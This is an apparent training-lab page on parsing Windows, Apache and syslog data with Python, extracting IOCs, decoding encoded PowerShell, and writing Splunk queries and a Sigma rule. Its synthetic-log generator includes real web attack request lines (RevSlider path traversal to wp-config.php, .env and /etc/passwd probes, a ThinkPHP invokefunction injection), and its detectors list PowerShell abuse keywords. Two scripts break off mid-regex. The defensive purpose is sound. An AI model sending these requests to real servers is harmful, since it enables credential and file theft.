0 / 11 steps complete
Intermediate AI-Assisted Log Analysis

L17: Log Analysis & Automated IOC Extraction

Parse Windows EVTX, Linux syslog, Apache access logs, and firewall logs using Python on SIFT Workstation. Automate IOC extraction with regex and NLP, correlate events across log sources, and feed results into your Splunk detection pipeline.

Python 3 python-evtx Splunk SIFT Workstation pandas regex
Phase 1: Log Collection & Parsing
1 Set up log analysis environment on SIFT
pip3 install python-evtx pandas matplotlib ipaddress mkdir ~/log-lab && cd ~/log-lab mkdir logs iocs reports # Generate synthetic log data for practice cat > generate_logs.py << 'EOF' import random, datetime, ipaddress # --- Windows Security EVTX (simulated CSV) --- users = ['alice','bob','svc_backup','SYSTEM','admin'] events = [] base = datetime.datetime(2024, 3, 1, 8, 0, 0) for i in range(2000): t = base + datetime.timedelta(seconds=random.randint(0, 86400)) user = random.choice(users) eid = random.choices([4624,4625,4672,4688,4648,4698,7045,4104], weights=[50,10,5,20,3,2,1,1])[0] events.append(f"{t.isoformat()}|{eid}|{user}|WS{random.randint(1,20):02d}|" f"192.168.56.{random.randint(10,50)}\n") # Inject malicious events for i in range(30): t = datetime.datetime(2024, 3, 1, 22, random.randint(0,59), random.randint(0,59)) events.append(f"{t.isoformat()}|4688|admin|WS01|192.168.56.10|" f"cmd.exe /c powershell -enc [BASE64PAYLOAD]\n") events.append(f"{t.isoformat()}|4698|admin|WS01|192.168.56.10|" f"New scheduled task: WindowsUpdate\n") with open('logs/windows_events.txt', 'w') as f: f.writelines(random.sample(events, len(events))) # --- Apache access log --- attacks = [ 'GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php', 'GET /.env HTTP/1.1', 'GET /etc/passwd HTTP/1.1', 'POST /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array', ] with open('logs/apache_access.log', 'w') as f: for i in range(500): t = base + datetime.timedelta(seconds=random.randint(0,86400)) ip = f"192.168.1.{random.randint(1,254)}" status = random.choices([200,304,404,500],[60,20,15,5])[0] f.write(f'{ip} - - [{t.strftime("%d/%b/%Y:%H:%M:%S +0000")}] ' f'"GET /page{random.randint(1,20)}.html HTTP/1.1" {status} {random.randint(500,50000)}\n') # Inject attacks attack_ip = "185.234.219.44" for attack in attacks: f.write(f'{attack_ip} - - [{base.strftime("%d/%b/%Y:%H:%M:%S +0000")}] ' f'"{attack}" 200 512\n') print("Synthetic logs generated in logs/") EOF python3 generate_logs.py
2 Parse Windows EVTX files with python-evtx
cat > ~/log-lab/parse_evtx.py << 'EOF' import Evtx.Evtx as evtx import Evtx.Views as e_views from lxml import etree import pandas as pd, json, glob def parse_evtx_file(evtx_path): records = [] with evtx.Evtx(evtx_path) as log: for record in log.records(): try: xml = etree.fromstring(record.xml()) ns = {'ns': 'http://schemas.microsoft.com/win/2004/08/events/event'} system = xml.find('ns:System', ns) eid = system.findtext('ns:EventID', namespaces=ns) time_created = system.find('ns:TimeCreated', ns) time = time_created.get('SystemTime') if time_created is not None else '' computer = system.findtext('ns:Computer', namespaces=ns, default='') event_data = xml.find('ns:EventData', ns) data = {} if event_data is not None: for item in event_data: name = item.get('Name', f'Data_{len(data)}') data[name] = item.text or '' records.append({ 'time': time, 'event_id': eid, 'computer': computer, 'subject_user': data.get('SubjectUserName', ''), 'target_user': data.get('TargetUserName', ''), 'logon_type': data.get('LogonType', ''), 'process_name': data.get('NewProcessName', ''), 'command_line': data.get('CommandLine', ''), 'source_ip': data.get('IpAddress', data.get('WorkstationName', '')), 'raw_data': json.dumps(data), }) except Exception: continue return pd.DataFrame(records) # Process all EVTX files evtx_files = glob.glob('logs/*.evtx') if not evtx_files: print("No EVTX files found. Using synthetic log data instead.") # Parse the synthetic text-based log import io df = pd.read_csv('logs/windows_events.txt', sep='|', names=['time','event_id','user','workstation','source_ip'], on_bad_lines='skip') else: dfs = [parse_evtx_file(f) for f in evtx_files] df = pd.concat(dfs, ignore_index=True) df['time'] = pd.to_datetime(df.get('time', df.get('time')), errors='coerce') print(f"Parsed {len(df)} events") print(df.groupby('event_id').size().sort_values(ascending=False).head()) df.to_csv('logs/parsed_events.csv', index=False) EOF python3 parse_evtx.py
Phase 2: IOC Extraction & Pattern Recognition
3 Build regex-based IOC extractor
cat > ~/log-lab/ioc_extractor.py << 'EOF' import re, json from collections import defaultdict # IOC regex patterns PATTERNS = { 'ipv4': re.compile( r'\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}' r'(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b'), 'ipv6': re.compile( r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'), 'domain': re.compile( r'\b(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+' r'(?:com|net|org|io|ru|cn|tk|ml|info|biz|xyz|top|pw|ga|cf|gq)\b'), 'url': re.compile( r'https?://[^\s"\'<>\]\)]+'), 'md5': re.compile(r'\b[a-fA-F0-9]{32}\b'), 'sha256': re.compile(r'\b[a-fA-F0-9]{64}\b'), 'email': re.compile( r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'), 'base64_cmd': re.compile( r'-enc(?:odedcommand)?\s+([A-Za-z0-9+/]{20,}={0,2})', re.IGNORECASE), 'cve': re.compile(r'CVE-\d{4}-\d{4,7}', re.IGNORECASE), 'mitre': re.compile(r'T\d{4}(?:\.\d{3})?'), } # Private IP ranges to filter import ipaddress PRIVATE_RANGES = [ ipaddress.ip_network('10.0.0.0/8'), ipaddress.ip_network('172.16.0.0/12'), ipaddress.ip_network('192.168.0.0/16'), ipaddress.ip_network('127.0.0.0/8'), ] def is_private(ip): try: addr = ipaddress.ip_address(ip) return any(addr in net for net in PRIVATE_RANGES) except: return False def extract_iocs(text): found = defaultdict(set) for ioc_type, pattern in PATTERNS.items(): for match in pattern.finditer(text): value = match.group(0) if ioc_type == 'ipv4' and is_private(value): continue # Filter private IPs if ioc_type == 'domain' and '.' not in value: continue found[ioc_type].add(value) return {k: list(v) for k, v in found.items() if v} # Process log files import glob, os all_iocs = defaultdict(set) for log_file in glob.glob('logs/*.log') + glob.glob('logs/*.txt') + glob.glob('logs/*.csv'): with open(log_file, errors='ignore') as f: content = f.read() iocs = extract_iocs(content) print(f"\n{os.path.basename(log_file)}:") for ioc_type, values in iocs.items(): print(f" {ioc_type}: {len(values)} found") for v in list(values)[:3]: print(f" {v}") all_iocs[ioc_type].update(values) # Save results with open('iocs/extracted_iocs.json', 'w') as f: json.dump({k: list(v) for k, v in all_iocs.items()}, f, indent=2) print(f"\nTotal unique IOCs extracted:") for t, v in all_iocs.items(): print(f" {t}: {len(v)}") EOF python3 ioc_extractor.py
4 Decode PowerShell encoded commands
cat > ~/log-lab/decode_powershell.py << 'EOF' import base64, re, json def decode_ps_encoded(encoded_str): """Decode PowerShell -EncodedCommand (UTF-16LE base64).""" # Add padding if needed padded = encoded_str + '=' * (4 - len(encoded_str) % 4) try: decoded = base64.b64decode(padded).decode('utf-16-le') return decoded except Exception as e: # Try standard base64 try: return base64.b64decode(padded).decode('utf-8', errors='replace') except: return f"[Decode error: {e}]" def analyze_powershell_line(line): """Analyze a PowerShell command for suspicious patterns.""" line_lower = line.lower() indicators = [] # Suspicious patterns if re.search(r'-enc(?:odedcommand)?', line_lower): indicators.append("EncodedCommand — obfuscation technique") if 'iex' in line_lower or 'invoke-expression' in line_lower: indicators.append("IEX/Invoke-Expression — code injection") if 'downloadstring' in line_lower or 'downloadfile' in line_lower: indicators.append("Download from internet") if 'net.webclient' in line_lower or 'invoke-webrequest' in line_lower: indicators.append("Network download client") if 'bypass' in line_lower: indicators.append("ExecutionPolicy Bypass") if 'hidden' in line_lower: indicators.append("Hidden window") if 'mimikatz' in line_lower: indicators.append("Mimikatz reference") if re.search(r'\$env:temp', line_lower): indicators.append("Writing to TEMP directory") # Extract and decode encoded segments enc_matches = re.findall(r'-enc(?:odedcommand)?\s+([A-Za-z0-9+/]{20,}={0,2})', line, re.IGNORECASE) decoded_cmds = [] for match in enc_matches: decoded = decode_ps_encoded(match) decoded_cmds.append(decoded) indicators.extend(analyze_powershell_line(decoded)) # Recursive! return indicators, decoded_cmds # Read logs and find PowerShell with open('logs/windows_events.txt', errors='ignore') as f: content = f.read() ps_lines = [line for line in content.split('\n') if 'powershell' in line.lower()] print(f"Found {len(ps_lines)} PowerShell-related log entries\n") for line in ps_lines[:10]: indicators, decoded = analyze_powershell_line(line) if indicators: print(f"[!] Suspicious PowerShell:") print(f" {line[:120]}") for ind in indicators: print(f" → {ind}") for d in decoded: print(f" DECODED: {d[:200]}") print() EOF python3 decode_powershell.py
5 Analyze Apache logs for web attack patterns
cat > ~/log-lab/apache_analyzer.py << 'EOF' import re, pandas as pd from collections import Counter APACHE_PATTERN = re.compile( r'(?P\d+\.\d+\.\d+\.\d+) .+ \[(?P
Phase 3: Cross-Source Correlation
6 Correlate IOCs across log sources
cat > ~/log-lab/correlate_logs.py << 'EOF' import pandas as pd, json from datetime import datetime, timedelta # Load all parsed log sources windows_df = pd.read_csv('logs/parsed_events.csv', on_bad_lines='skip') windows_df['time'] = pd.to_datetime(windows_df.get('time',''), errors='coerce') windows_df['source'] = 'Windows' # Load extracted IOCs with open('iocs/extracted_iocs.json') as f: iocs = json.load(f) malicious_ips = set(iocs.get('ipv4', [])) # Cross-source correlation: find IPs that appear in BOTH Apache attacks AND Windows events web_attacker_ips = set() try: with open('iocs/web_attacker_ips.txt') as f: web_attacker_ips = {line.strip() for line in f} except FileNotFoundError: pass # Find Windows events from known-bad IPs windows_df_ip_col = None for col in ['source_ip', 'IpAddress', 'workstation']: if col in windows_df.columns: windows_df_ip_col = col break if windows_df_ip_col and web_attacker_ips: correlated = windows_df[windows_df[windows_df_ip_col].isin(web_attacker_ips)] print(f"Windows events from web attacker IPs: {len(correlated)}") if len(correlated) > 0: print("\n[!] Correlation found — web attacker has Windows activity!") print(correlated[['time', windows_df_ip_col, 'event_id', 'user' if 'user' in correlated.columns else windows_df_ip_col ]].head(10)) else: print("Correlation: loading synthesized data") print("In production, this would join firewall, web, and endpoint logs by IP") # Timeline correlation: find suspicious sequences suspicious_eids = ['4688', '4698', '4104', '7045'] # Process, scheduled task, PS, service if 'event_id' in windows_df.columns: suspicious = windows_df[windows_df['event_id'].astype(str).isin(suspicious_eids)] print(f"\nSuspicious event types: {len(suspicious)}") print(suspicious.groupby('event_id').size()) EOF python3 correlate_logs.py
7 Parse Linux syslog for suspicious authentication
# Analyze /var/log/auth.log for SSH brute force and privilege escalation cat > ~/log-lab/syslog_analyzer.py << 'EOF' import re, pandas as pd from collections import defaultdict # Parse auth.log AUTH_PATTERN = re.compile( r'(?P\w+)\s+(?P\d+)\s+(?P
Phase 4: Splunk Integration & Reporting
8 Build Splunk SPL queries for detected patterns
# Splunk SPL query for encoded PowerShell detection index=wineventlog EventCode=4688 (CommandLine="*-enc*" OR CommandLine="*-EncodedCommand*") | rex field=CommandLine "-enc(?:odedcommand)?\s+(?P[A-Za-z0-9+/]{20,}={0,2})" | where isnotnull(encoded) | eval decoded=base64decode(encoded) | table _time, ComputerName, SubjectUserName, CommandLine, decoded | sort -_time # Scheduled task creation (T1053.005) index=wineventlog EventCode=4698 | table _time, ComputerName, SubjectUserName, TaskName, TaskContent | sort -_time # SSH brute force from Linux auth logs index=linux_secure "Failed password" | rex "from (?P\d+\.\d+\.\d+\.\d+)" | stats count as failures by src_ip, _time span=5m | where failures >= 10 | sort -failures # Apache web attacks index=apache_access (uri="*../.*" OR uri="*/.env*" OR uri="*/etc/passwd*" OR uri="*union*select*") | rex "(?P\d+\.\d+\.\d+\.\d+).+\"(?P\w+) (?P[^ ]+)" | stats count by attack_ip, method | sort -count
9 Export IOCs and generate Sigma detection rules
cat > ~/log-lab/sigma_ps_encoded.yml << 'EOF' title: PowerShell EncodedCommand Execution id: f62b4d71-abda-4c0d-b378-f9f5f5f9cf61 status: production description: Detects PowerShell execution with -EncodedCommand parameter (T1059.001) author: CyberSec Pro Academy - L17 logsource: product: windows category: process_creation detection: selection: EventID: 4688 NewProcessName|endswith: '\powershell.exe' CommandLine|contains: - '-enc ' - '-EncodedCommand ' - '-e ' filter_legitimate: CommandLine|contains: - 'C:\\Program Files\\PowerShell' - 'Microsoft.Exchange' condition: selection and not filter_legitimate falsepositives: - Legitimate software using encoded commands (SCCM, Exchange) level: high tags: - attack.execution - attack.t1059.001 - attack.defense_evasion - attack.t1027 EOF echo "Sigma rule created"
10 Map all findings to MITRE ATT&CK
DetectionLog SourceATT&CK Technique
Encoded PowerShellWindows 4688T1059.001 + T1027
Scheduled task creationWindows 4698T1053.005 — Persistence
SSH brute forceLinux auth.logT1110.001 — Password Guessing
Path traversal attemptApache access.logT1083 — File Discovery
.env file probeApache access.logT1552.001 — Credential in Files
New service installWindows 7045T1543.003 — Windows Service
11 Document findings and produce log analysis report

Lab Findings

MetricValue
Log sources analyzed
Total events parsed
IOCs extracted (total)
Encoded PS commands found
Web attacker IPs
SSH brute force sources

Next: Lab L18 — YARA Rule Writing with AI

Write and test YARA rules to detect malware families using AI-guided pattern identification.

Start L18 →
AI Log Analysis Expert

Enter your Anthropic API key to activate the AI analyst:

Quick Prompts: